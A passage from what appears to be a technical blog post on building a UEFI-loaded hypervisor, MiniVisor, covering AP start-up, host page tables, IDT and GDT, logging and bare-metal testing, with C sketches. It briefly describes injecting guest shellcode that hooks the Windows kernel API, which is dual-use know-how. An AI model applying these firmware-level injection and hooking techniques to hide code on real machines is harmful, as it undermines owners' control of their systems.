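   Returns false when the address is not covered by any region. */
static bool ConvertToVirtual(const RUNTIME_REGION *map, size_t count,
                             uint64_t physical, uint64_t *virtualAddress)
{
    for (size_t i = 0; i < count; i++) {
        uint64_t size = map[i].NumberOfPages * PAGE_SIZE_4K;
        if (physical >= map[i].PhysicalStart &&
            physical - map[i].PhysicalStart < size) {
            *virtualAddress = map[i].VirtualStart +
                              (physical - map[i].PhysicalStart);
            return true;
        }
    }
    return false;
}
```

<div>
With a region that maps 0xdf2000 to 0xfffff803`1ce40000, an address 0x10 bytes into the region keeps the same offset after conversion, while an address outside every region cannot be converted. The latter case is the situation the hypervisor must avoid for anything it still references after the switch.</div>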
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Application Processor Start-Up</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Another unique event that the
UEFI hypervisor has to handle is processor initialization. Processors that are
not selected as a bootstrap processor (BSP; the processor initialized first)
are called application processors (APs) and are initialized after transitioning
to the virtual mode. This is done by BSP signaling INIT and Startup-IPI (SIPI).
When SIPI is signaled, APs start their execution in the real-mode and go through
mode transitions up to the long-mode (in the case of 64-bit operating
systems). This requires some extra VM-exit handling that was not relevant for
the blue pill style hypervisors.<o:p></o:p></span></div>
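<div>
As a rough idea of what that extra handling can look like on Intel VT-x, the sketch below models the guest state as an ordinary struct. GUEST_AP_STATE and HandleApStartupExit are hypothetical names, and this is not necessarily how any particular hypervisor implements it. It assumes the basic exit reasons 3 (INIT signal) and 4 (start-up IPI), the SIPI vector in bits [7:0] of the exit qualification, and the activity-state encodings 0 (active) and 3 (wait-for-SIPI). A real handler would also reset the remaining guest registers on INIT and write these values to the VMCS.</div>

```c
#include <stdint.h>

enum { EXIT_REASON_INIT_SIGNAL = 3, EXIT_REASON_SIPI = 4 };
enum { ACTIVITY_STATE_ACTIVE = 0, ACTIVITY_STATE_WAIT_FOR_SIPI = 3 };

/* Hypothetical subset of the guest state a hypervisor keeps for an AP. */
typedef struct {
    uint16_t CsSelector;
    uint64_t CsBase;
    uint64_t Rip;
    uint32_t ActivityState;
} GUEST_AP_STATE;

/* Emulates the effect of INIT and SIPI on an AP running as a guest. */
static void HandleApStartupExit(GUEST_AP_STATE *guest, uint32_t exitReason,
                                uint64_t exitQualification)
{
    switch (exitReason & 0xFFFFu) {  /* basic exit reason is bits [15:0] */
    case EXIT_REASON_INIT_SIGNAL:
        /* The AP stops and waits for the start-up IPI. */
        guest->ActivityState = ACTIVITY_STATE_WAIT_FOR_SIPI;
        break;
    case EXIT_REASON_SIPI: {
        /* Start executing in real-mode at 000VV000H (CS = VV00H, IP = 0). */
        uint64_t vector = exitQualification & 0xFFu;
        guest->CsSelector = (uint16_t)(vector << 8);
        guest->CsBase = vector << 12;
        guest->Rip = 0;
        guest->ActivityState = ACTIVITY_STATE_ACTIVE;
        break;
    }
    default:
        break;  /* other exits are out of scope for this sketch */
    }
}
```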
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Those unique aspects of the
UEFI environment pose technical challenges and require different hypervisor
design considerations.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h2 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Challenges, Solutions, and
Considerations</span></h2>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Host CR3</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">As mentioned, the host CR3
becomes invalid if the value at the time of driver load is used, because it
points to the physical mode page tables, which get destroyed. The most straightforward
solution is to set up our own page tables with the same translation as
the existing ones (i.e., the physical mode page tables) and use them for the host.
This may sound complicated but is implemented with just 50 lines of C code in
MiniVisor.</span></div>
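<div>
<span style="color: black; font-size: 13.5pt;">To make the idea concrete, here is a minimal sketch of building identity-mapped (virtual address equals physical address) page tables. It is not MiniVisor's actual code. It assumes the processor supports 1 GiB pages and maps only the first 512 GiB. The names identity_tables_t, build_identity_map, and translate are made up for illustration, and translate is only a software walk used to check the result.</span></div>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_PRESENT  (1ull << 0)
#define PAGE_WRITE    (1ull << 1)
#define PAGE_LARGE    (1ull << 7)            /* PS bit: the PDPT entry maps a 1 GiB page */
#define ENTRY_COUNT   512
#define ADDR_MASK_1G  0x000FFFFFC0000000ull  /* bits 51:30 of a 1 GiB page entry */

/* Hypothetical container for the two tables this sketch needs. */
typedef struct {
    _Alignas(4096) uint64_t pml4[ENTRY_COUNT];
    _Alignas(4096) uint64_t pdpt[ENTRY_COUNT];
} identity_tables_t;

/* Fills the tables so that the first 512 GiB are mapped with VA == PA.
   pdpt_pa is the physical address of tables->pdpt; in the UEFI physical mode
   this is simply the pointer value. */
void build_identity_map(identity_tables_t *tables, uint64_t pdpt_pa)
{
    assert((pdpt_pa & 0xFFF) == 0);  /* page tables must be 4 KiB aligned */
    for (size_t i = 0; i < ENTRY_COUNT; i++) {
        tables->pml4[i] = 0;
        tables->pdpt[i] = ((uint64_t)i << 30) | PAGE_PRESENT | PAGE_WRITE | PAGE_LARGE;
    }
    tables->pml4[0] = pdpt_pa | PAGE_PRESENT | PAGE_WRITE;
}

/* Software walk of the tables above. Returns 1 and stores the physical
   address on success, or 0 when the address is not mapped. Only one PDPT
   exists in this sketch, so the walk reads tables->pdpt directly. */
int translate(const identity_tables_t *tables, uint64_t va, uint64_t *pa)
{
    size_t pml4_index = (size_t)((va >> 39) & 0x1FF);
    size_t pdpt_index = (size_t)((va >> 30) & 0x1FF);
    if (!(tables->pml4[pml4_index] & PAGE_PRESENT)) {
        return 0;
    }
    uint64_t pdpte = tables->pdpt[pdpt_index];
    if (!(pdpte & PAGE_PRESENT) || !(pdpte & PAGE_LARGE)) {
        return 0;
    }
    *pa = (pdpte & ADDR_MASK_1G) | (va & 0x3FFFFFFFull);
    return 1;
}
```

<div>
<span style="color: black; font-size: 13.5pt;">On real hardware, the physical address of the PML4 would then be written to the host CR3 field of the VMCS. Systems without 1 GiB page support would need an extra level of page directories with 2 MiB pages.</span></div>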
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">However, this results in the host and the guest having
different address translations once the guest switches to the virtual mode, which
makes it significantly more difficult for the host to interact with the guest. For
example, host code can no longer be debugged with tools like WinDbg because
none of the Windows code is mapped in a usable form while the host is running. If the hypervisor needs complex interaction with guest virtual addresses, other approaches might be simpler in the end. In a private build, I implemented guest shellcode that runs in the same address space as the NT system process for interaction with the guest.</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAoHa7rrdXh33RYva_FxzyMnm1VwpOBaKiKDciAVnjJ8g7rSw5GSlNSAyqHSCISeSZKyQWCc_WjLHkPrlwhAfYZdAV5gpe44R2opRQv8ILAI9UnDCcnyU8m_Vdvfi4rZ7B_dnNVHaZzIo/s1600/Annotation+2020-03-08+200010.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="808" data-original-width="1600" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAoHa7rrdXh33RYva_FxzyMnm1VwpOBaKiKDciAVnjJ8g7rSw5GSlNSAyqHSCISeSZKyQWCc_WjLHkPrlwhAfYZdAV5gpe44R2opRQv8ILAI9UnDCcnyU8m_Vdvfi4rZ7B_dnNVHaZzIo/s400/Annotation+2020-03-08+200010.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Injecting the guest agent that hooks Windows kernel API</td></tr>
</tbody></table>
</div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">For the same reason, it also becomes harder to access
guest virtual memory from the host without implementing
a guest-virtual-to-host-virtual mapping mechanism. MiniVisor implements this
in MemoryAccess.c. Essentially every hypervisor has to implement such a mechanism.</span></div>
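<div>
<span style="color: black; font-size: 13.5pt;">One detail such a mechanism has to get right is that a guest virtual range that looks contiguous may be backed by unrelated pages, so the host must translate and copy one page at a time. The sketch below illustrates only that part and is not taken from MemoryAccess.c. The translate_fn callback stands in for the real page-table walk, and toy_guest_t and toy_translate are a made-up guest used for demonstration.</span></div>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PAGE_SIZE 4096u

/* Hypothetical callback: resolves one guest virtual address to a pointer the
   host can dereference, or returns NULL if the address is not mapped. */
typedef void *(*translate_fn)(uint64_t guest_va, void *context);

/* Copies up to size bytes from guest virtual memory, translating page by
   page. Returns the number of bytes copied, which is smaller than size when
   an unmapped page is hit. */
size_t read_guest_virtual(void *dst, uint64_t guest_va, size_t size,
                          translate_fn translate, void *context)
{
    assert(dst != NULL && translate != NULL);
    uint8_t *out = dst;
    size_t copied = 0;
    while (copied < size) {
        uint64_t va = guest_va + copied;
        /* Never copy past the end of the page that va belongs to. */
        size_t left_in_page = PAGE_SIZE - (size_t)(va & (PAGE_SIZE - 1));
        size_t remaining = size - copied;
        size_t chunk = remaining < left_in_page ? remaining : left_in_page;
        const void *src = translate(va, context);
        if (src == NULL) {
            break;
        }
        memcpy(out + copied, src, chunk);
        copied += chunk;
    }
    return copied;
}

/* Toy guest for demonstration: virtual pages 0x1000 and 0x2000 are adjacent
   in the guest but stored in reverse order on the host side. */
typedef struct {
    uint8_t backing_for_0x2000[PAGE_SIZE];
    uint8_t backing_for_0x1000[PAGE_SIZE];
} toy_guest_t;

void *toy_translate(uint64_t guest_va, void *context)
{
    toy_guest_t *guest = context;
    uint64_t offset = guest_va & (PAGE_SIZE - 1);
    switch (guest_va & ~(uint64_t)(PAGE_SIZE - 1)) {
    case 0x1000: return guest->backing_for_0x1000 + offset;
    case 0x2000: return guest->backing_for_0x2000 + offset;
    default:     return NULL;
    }
}
```

<div>
<span style="color: black; font-size: 13.5pt;">Reading 8 bytes starting at guest address 0x1FFC with this helper takes 4 bytes from one backing page and 4 from the other, which a single memcpy on the translated start address would get wrong.</span></div>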
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Host IDT</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">For the same reason that the host
CR3 is discarded, the host IDT becomes invalid if the value at the time of
driver load is used. Although this does not cause an issue immediately because
interrupts are disabled during execution of the host, any programming error
that causes an exception will result in a triple fault without running any diagnostics code.
The solution is to create a dedicated IDT for the host.</span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Having its own IDT, however,
means that an NMI can no longer be delivered to the Windows kernel if it occurs
during the execution of the host (reminder: NMIs still occur even if interrupts
are disabled). MiniVisor discards NMIs for simplicity, but you should consider reinjecting
them into the guest instead.</span></div>
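<div>
<span style="color: black; font-size: 13.5pt;">For readers unfamiliar with the IDT format, the following sketch shows how a single 64-bit interrupt gate could be encoded. The layout follows the 16-byte gate descriptor documented in the Intel SDM. The type and function names are made up for this example and are not MiniVisor's.</span></div>

```c
#include <assert.h>
#include <stdint.h>

/* 64-bit mode IDT gate descriptor (16 bytes). */
typedef struct {
    uint16_t offset_low;       /* handler address bits 15:0 */
    uint16_t selector;         /* code segment selector */
    uint8_t  ist;              /* interrupt stack table index, 0 = unused */
    uint8_t  type_attributes;  /* P, DPL, and gate type */
    uint16_t offset_middle;    /* handler address bits 31:16 */
    uint32_t offset_high;      /* handler address bits 63:32 */
    uint32_t reserved;
} idt_gate_t;

_Static_assert(sizeof(idt_gate_t) == 16, "an IDT gate must be 16 bytes");

#define GATE_PRESENT_DPL0_INTERRUPT 0x8E  /* P=1, DPL=0, type=0xE (interrupt gate) */

/* Encodes a present, ring-0 interrupt gate that points at handler. */
idt_gate_t make_interrupt_gate(uint64_t handler, uint16_t code_selector)
{
    /* VMX requires the host CS selector to have RPL = 0 and TI = 0. */
    assert((code_selector & 0x7) == 0);
    idt_gate_t gate = {
        .offset_low = (uint16_t)(handler & 0xFFFF),
        .selector = code_selector,
        .ist = 0,
        .type_attributes = GATE_PRESENT_DPL0_INTERRUPT,
        .offset_middle = (uint16_t)((handler >> 16) & 0xFFFF),
        .offset_high = (uint32_t)(handler >> 32),
        .reserved = 0,
    };
    return gate;
}

/* Reassembles the handler address stored in a gate. */
uint64_t gate_handler_address(const idt_gate_t *gate)
{
    return ((uint64_t)gate->offset_high << 32) |
           ((uint64_t)gate->offset_middle << 16) |
           gate->offset_low;
}
```

<div>
<span style="color: black; font-size: 13.5pt;">A host IDT would hold 256 of these entries. Vector 2 is the NMI, so its handler is the natural place to record a pending NMI for later reinjection.</span></div>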
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Host GDT</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">You may wonder about the GDT.
Yes, the host needs its own GDT as well, and that GDT requires a modification because
the firmware does not set up the task state segment (TSS) that is required for VMX.</span></div>
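<div>
<span style="color: black; font-size: 13.5pt;">The modification amounts to appending a TSS descriptor to the copied GDT and using its selector as the host TR. Here is a minimal sketch of encoding such a descriptor, following the 16-byte 64-bit TSS descriptor layout in the Intel SDM. The names are illustrative assumptions rather than MiniVisor's.</span></div>

```c
#include <assert.h>
#include <stdint.h>

/* 64-bit mode TSS descriptor. It occupies two consecutive 8-byte GDT slots. */
typedef struct {
    uint16_t limit_low;             /* limit bits 15:0 */
    uint16_t base_low;              /* base bits 15:0 */
    uint8_t  base_middle;           /* base bits 23:16 */
    uint8_t  access;                /* P, DPL, and system segment type */
    uint8_t  limit_high_and_flags;  /* limit bits 19:16 in the low nibble */
    uint8_t  base_high;             /* base bits 31:24 */
    uint32_t base_upper;            /* base bits 63:32 */
    uint32_t reserved;
} tss_descriptor_t;

_Static_assert(sizeof(tss_descriptor_t) == 16, "a TSS descriptor must be 16 bytes");

#define TSS_PRESENT_AVAILABLE 0x89  /* P=1, DPL=0, type=0x9 (available 64-bit TSS) */
#define TSS_LIMIT_64BIT       0x67  /* a 64-bit TSS is 104 bytes long */

/* Encodes a descriptor for a TSS located at base with the given limit. */
tss_descriptor_t make_tss_descriptor(uint64_t base, uint32_t limit)
{
    assert(limit <= 0xFFFFF);  /* the limit field is 20 bits wide */
    tss_descriptor_t descriptor = {
        .limit_low = (uint16_t)(limit & 0xFFFF),
        .base_low = (uint16_t)(base & 0xFFFF),
        .base_middle = (uint8_t)((base >> 16) & 0xFF),
        .access = TSS_PRESENT_AVAILABLE,
        .limit_high_and_flags = (uint8_t)((limit >> 16) & 0xF),
        .base_high = (uint8_t)((base >> 24) & 0xFF),
        .base_upper = (uint32_t)(base >> 32),
        .reserved = 0,
    };
    return descriptor;
}

/* Reassembles the TSS base address stored in a descriptor. */
uint64_t tss_descriptor_base(const tss_descriptor_t *descriptor)
{
    return ((uint64_t)descriptor->base_upper << 32) |
           ((uint64_t)descriptor->base_high << 24) |
           ((uint64_t)descriptor->base_middle << 16) |
           descriptor->base_low;
}
```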
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Logging</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">The console output API is a boot-time
service that cannot be used after the transition to run time. Hence,
console-based logging must cease after that point. This could be addressed
in several ways, such as hooking into the operating system's logging API, but the
simplest solution is to use serial output instead of console output. This has
its limitations but requires almost zero extra code.</span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Another sensible option is to
keep a ring buffer that stores log entries and, later, let a client application
pull and print them out.</span></div>
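<div>
<span style="color: black; font-size: 13.5pt;">A ring buffer of this kind can be sketched as below. This is an illustration under simplifying assumptions, not code from MiniVisor: entries are fixed-size strings, the oldest entry is overwritten when the buffer is full, and there is no locking, which a multi-processor hypervisor would need. The slot count is kept small only to make the behavior easy to follow.</span></div>

```c
#include <assert.h>
#include <stddef.h>

#define LOG_SLOT_COUNT 8    /* deliberately small for the example */
#define LOG_SLOT_SIZE  128  /* maximum entry length including the terminator */

typedef struct {
    char   slots[LOG_SLOT_COUNT][LOG_SLOT_SIZE];
    size_t head;   /* index of the oldest stored entry */
    size_t count;  /* number of stored entries */
} log_ring_t;

/* Copies src into dst, truncating so that dst is always null-terminated.
   Written by hand because a hypervisor usually has no C library. */
static void copy_truncated(char *dst, size_t dst_size, const char *src)
{
    size_t i = 0;
    for (; i + 1 < dst_size && src[i] != '\0'; i++) {
        dst[i] = src[i];
    }
    dst[i] = '\0';
}

/* Stores a message, overwriting the oldest entry when the ring is full. */
void log_ring_push(log_ring_t *ring, const char *message)
{
    assert(ring != NULL && message != NULL);
    size_t tail = (ring->head + ring->count) % LOG_SLOT_COUNT;
    copy_truncated(ring->slots[tail], LOG_SLOT_SIZE, message);
    if (ring->count < LOG_SLOT_COUNT) {
        ring->count++;
    } else {
        ring->head = (ring->head + 1) % LOG_SLOT_COUNT;  /* oldest entry was overwritten */
    }
}

/* Removes the oldest message into out. Returns 1 on success, 0 if empty. */
int log_ring_pop(log_ring_t *ring, char *out, size_t out_size)
{
    assert(ring != NULL && out != NULL && out_size > 0);
    if (ring->count == 0) {
        return 0;
    }
    copy_truncated(out, out_size, ring->slots[ring->head]);
    ring->head = (ring->head + 1) % LOG_SLOT_COUNT;
    ring->count--;
    return 1;
}
```

<div>
<span style="color: black; font-size: 13.5pt;">The host would call the push function from its logging routine, and the client application would drain entries through some interface to the hypervisor, for example a hypercall that ends up calling the pop function.</span></div>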
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Testing Application Processors
Startup</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Application processor start-up requires the hypervisor to
handle additional VM-exits and to properly emulate paging mode transitions, neither of which is
relevant for blue pill-style hypervisors. Specifically, handling of
INIT, SIPI, and CR0.PG access is required.</span></div>
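<div>
<span style="color: black; font-size: 13.5pt;">As an illustration of the SIPI part, the sketch below derives the state an AP should start with from the SIPI vector. Per the Intel SDM, the vector is reported in bits 7:0 of the exit qualification, and the AP begins execution in real mode at physical address vector * 0x1000. The structure and function names are assumptions for this example, and writing the values into the VMCS is omitted.</span></div>

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical subset of the guest state to set when emulating SIPI. */
typedef struct {
    uint16_t cs_selector;
    uint64_t cs_base;
    uint64_t rip;
} ap_start_state_t;

/* Computes the real-mode entry state from the exit qualification of a
   SIPI VM-exit. */
ap_start_state_t ap_state_from_sipi(uint64_t exit_qualification)
{
    uint8_t vector = (uint8_t)(exit_qualification & 0xFF);
    ap_start_state_t state = {
        .cs_selector = (uint16_t)((uint16_t)vector << 8),
        .cs_base = (uint64_t)vector << 12,
        .rip = 0,
    };
    /* Real-mode invariant: segment base equals selector * 16. */
    assert(state.cs_base == (uint64_t)state.cs_selector << 4);
    return state;
}
```

<div>
<span style="color: black; font-size: 13.5pt;">For example, a SIPI vector of 0x9A makes the AP start at CS:IP = 9A00:0000, that is, physical address 0x9A000.</span></div>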
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">For me, this was one of the most
challenging parts of writing a hypervisor that supports booting an operating
system, mostly due to the lack of virtualization solutions usable as a test
environment and the differences between them and the bare-metal environment (e.g.,
TLB and MSR behavior), which require thorough testing on bare metal.</span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">My recommendation is to buy and
set up a single-board computer with a serial port so you can at least do
printf-debugging (or, even better, one with Direct Connect Interface support). I might blog
about selecting devices and setting them up.</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0VCq-uSQ2QcunCW213Lpa7pSIl_INPa9h2BLBP0AlEZ-qxYYGSYgZ50oxoZtGhw2G5ibsicQEGetrZcLJSbWYmtQmQk6lzfxWZG-CBJ-e6KKnYmw-Sym8uaum7mIORg0PcLXXK-F_Lws/s1600/IMG_6272.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0VCq-uSQ2QcunCW213Lpa7pSIl_INPa9h2BLBP0AlEZ-qxYYGSYgZ50oxoZtGhw2G5ibsicQEGetrZcLJSbWYmtQmQk6lzfxWZG-CBJ-e6KKnYmw-Sym8uaum7mIORg0PcLXXK-F_Lws/s400/IMG_6272.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Testing with a single-board computer</td></tr>
</tbody></table>
<h3>
<span style="font-size: 13.5pt;">Driver vs Standalone File</span></h3>
<div>
